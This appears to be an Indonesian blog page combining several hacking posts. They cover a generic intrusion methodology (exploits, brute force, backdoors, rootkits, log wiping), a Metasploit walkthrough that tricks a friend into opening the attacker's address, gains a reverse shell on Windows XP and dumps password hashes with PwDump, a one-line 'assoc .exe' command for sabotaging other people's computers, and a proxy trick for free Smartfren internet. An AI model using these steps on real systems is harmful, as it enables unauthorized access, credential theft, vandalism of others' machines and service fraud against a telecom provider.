Cari Artikel Blog

Memuat...

Senin, 14 Mei 2012

Konsep Dasar Hacking


Iseng-iseng belajar hack bersama Boy.Rezza,,Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamathttp://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.
Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.


Bagian 1
*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ‘standar’, hacking sebenarnya tidak harus selalu sesuai dengan ‘standar’ ini.

Hacking buat pemula
- by aCh
Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….
Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….
Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.
Pro dan Kontra Hacking
Pro
Kontra
Etika Hacking
Semua informasi adalah free
Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security
Intrusion adalah ilustrasi kelemahan sistem
Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines
Hacking hanya pada idle machines
idle machines milik siapa ?
science education
hanya membobol tapi tidak merusak
“hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…

1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
– Secara Aktif : – portscanning
– network mapping
– OS Detection
– application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
– Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)
– via internet registries (informasi domain, IP Addres)
– Website yang menjadi terget


2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.orgmilw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->
$gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.target.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
– Secara berulang melakukan percobaan otentifikasi.
– Menebak username dan password.
– Cracking password file
~ Social Engineering
– Memperdayai user untuk memeberi tahu Username dan password
– Intinya ngibulin user….

3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd
Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang akan kita bahas di bagian 2 ini.



Bagian 2
Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.
Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit sertaPwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.
Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membacadokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.
Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakanPerl. Sekarang mari kita praktekkan!!
Pertama2 jalankan ‘mfsconsole’!
main1.JPG
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.
Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan tampak seperti gambar berikut :
exploit1.JPG
Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D
Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!
Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!
Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :
pwdump.JPG
Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah
C:\temp\Pwdump –o pass.txt 127.0.0.1
Klo berhasil akan tampak pada gambar berikut.
 dump1.JPG
 Lalu copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.
clean.JPG
Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).
Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.
Happy Hacking…..

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.
1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!!

Cara iseng merusak Komputer Orang



wah parah nih judulnya, lagi pengen ngerjain orang,hehehe
:biggrin:,,Tapi sebelum melanjutkan baca dulu TOS nya!



Perhatian "Artikel ini hanya sebagai bahan pembelajaran saja,untuk pembaca n sobat blogger smua,penulis tidak bertanggung jawab atas semua kerugian dan tindak kekerasan yang disebabkan oleh artikel ini!,,Silahkan terapkan pada diri sendiri dulu sebelum di praktekin ke orang lain!"...


Teknik merusak komputer yang satu ini tergolong teknik yang paling gampang dilakukan,karna tidak memerlukan software,namun kerusakan yang ditimbulkannnya sangat parah bahkan kalau para master komputer sekalipun kalau menemukan kerusakan seperti ini pasti langsung berpikir tidak bisa diselamatkan lagi jalan satu2nya instal ulang saja.


Kerusakan yang ditimbulkan adalah tidak berfungsi semua aplikasi,Komputer tetap berjalan normal dari mulai booting sampai masuk windows namun setelah itu tidak dapat digunakan lagi karna tidak bisa membuka satu aplikasi pun,,,,hmm lumayan parah


Cara membuat kerusakan seperti ini cukup mudah



klik star/ run / CMD
Ketikkan ASSOC.EXE = terserah kamu mau ngetik apa
Enter

Lihat hasilnya,,coba jalankan komputer,,

kenapa ini bisa terjadi?,,ini disebabkan fungsi exe yang tidak berfungsi lagi,,coba pake winnrar,,lihat file2 yang berakhiran .exe seperti winamp exe,dan aplikasi lainnya sekarang sudah berubah menjadi nama yang kamu ketikkan tadi


Trus gimana cara mengatasinya?

cara mengatasinya cukup mudah

Klik star run / ketikkan COMMAND
Setelah terbuka  ketik ASSOC.EXE=EXEFILE

Setelah itu komputer akan bekerja normal kembali...

Mudahkan merusak komputer orang:biggrin: apabila anda menemukan kasus yang rusaknya seperti ini mungkin pengalaman anda setelah membaca tulisan ini  bisa membantu



Cara hack modem smartfren ( internetan unlimited gratis)


 langsung ke caranya aja ya sob :  dial dulu modem sob pake kartu smartfren dan coba aja ke chome or firefox, lalu ketikkan:
Code:
smartfren.com@url:google.com
dan coba liat halaman pencarian google kebuka... jd ada vuln disitu.

yuk kita gabungin pake proxy....

ne software yg akn kita butuhkan.. dpt di 
DOWNLOAD DISINI



langsung saja!
1. Install program ispce td, trus buka, beri centang pada query mode, dan kita atur listen portx 127 biar gampang nantinya. klik OK.
[Image: Capture1.JPG]
2. Coz domain yg hanya bisa diakses saat pulsa smart sob habis "nol" adalhsmartfren.comsmart-telecom.co.id, dan jump.smart-telecom.co.id, jadi masuklah pd Query URL Configuration, pilih front query, trus masukkan salah satu domain tsb pd font query + simbol "@".


[Image: Capture2.JPG]
3. Kita beralih pd proxy configuration, unk proxy server silahkan cari sendiri, dgn catatan proxy dgn port 80 dan 3128 yg hanya bisa dgunakan disini, coz pihak smartfren mungkin hanya membuka kedua port tsb. unk proxy cari di google sendiri ea ato ke hidemyass.com banyak koq.. cari yang fast proxy, biar liar larinyaaa,,, hehehehhe
Ato kalo gak pengen repot pake aja ne proxy, tp gak ane jamin, lemoootnya ampuuunnn..!!


[Image: Capture.JPG]
4. Udahan dulu, klik REFRESH 3x, lalu minimize, jangan di-exit!!

next...

buka firefox. ke menu Options - Advanced - Network - Setting. Atur http proxy127.0.0.1, dan gunakan listen portx yg tadi yaitu 127., berikan centang pd use this proxy.........
kemudian kosongkan pd No proxy for.


[Image: Capture.JPG]
dan silahkan menikmati yg gratisan.

Bagi sob yg daerahx sudah tercover EVDO n make perangkat (modem) yg mendukung kecepatan EVDO rev A ato rev B,. pihak smart tdk membatasi bandwidth (kecepatan), speed bisa mencapai 3.1 Mbps ato sekitar 396,8 kb per detik. (bedakan antara bit dgn byte, 1 bytes= 8 bit)
Unk daerah yg hanya trdapat jaringan CDMA 1x cuma bs donlot sampek 19 kb per detik. jadi yg sabar aja ya..... heheheh


[Image: 261812_247337965277544_100000040266345_1...7237_n.jpg]

NOTE :
1. Pertama, agar gratisan dapat digunakan pd browser chrome da IE, pd browser IE masuklah ke Internet Options - Connections, pilih pd koneksi yg sedang sob gunakan, klik Settings. Masukkan proxy dan portnya seperti pd firefox td. lalu klik OK.OK lagi. dan OK lagi.
[Image: Capture.JPG]

Agar bisa dgunakan unk mendownload lewat IDM, pilih Download - Options - Proxy, berikan centang dan masukkan proxy di Use Http proxy. Klik OK.
[Image: Capture.JPG]
2. Kedua, beberapa situs ato blog mungkin tidak dpt dbuka dg sempurna, ataupun tdk dpt dibuka sama sekali, misl: mail.google.com, mail.yahoo.com. coz menggunakan protokol HTTPS

Cara meniru Template Orang





Kali Ini saya Akan Menjelaskan Tutorial Bagaimana Cara meniru Template Orang tutorial ini sangat mudah dan lebih baik langsung kita pelajari , langsung saja ke tutorialnya anda cukup melihat video di bawah ini






BILA BERMANFAAT JANGAN LUPA FOLLOW













KLIK SALAH SATU IKLAN UNTUK MENUTUP
Templat New 3 © 2008 Template by:
SkinCorner